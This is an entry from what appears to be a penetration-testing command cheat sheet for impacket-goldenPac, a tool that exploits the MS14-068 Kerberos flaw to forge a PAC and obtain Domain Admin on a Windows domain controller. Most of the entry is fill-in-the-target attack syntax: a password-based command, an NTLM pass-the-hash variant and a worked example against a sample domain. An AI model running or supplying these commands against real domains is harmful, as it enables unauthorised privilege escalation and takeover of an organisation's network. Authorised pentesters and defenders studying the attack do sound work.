Impacket goldenPac (MS14-068)

Exploit MS14-068 Kerberos privilege escalation to obtain Domain Admin via forged PAC

Tool
impacket-goldenPac
Category
Privilege Escalation / Trust Attacks
Platform
linux
Requires
password
Protocols
KERBEROS

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

impacket-goldenPac '<domain>/<user>:<password>@<dc_fqdn>'

Credential variants

The same attack using a different authentication material.

NTLM Hash requires NTLM hash

impacket-goldenPac -hashes ':<hash>' '<domain>/<user>@<dc_fqdn>'

Examples

impacket-goldenPac 'CORP.LOCAL/user:password@dc01.corp.local'

Tags

impacket ms14-068 goldenpac privilege-escalation kerberos pac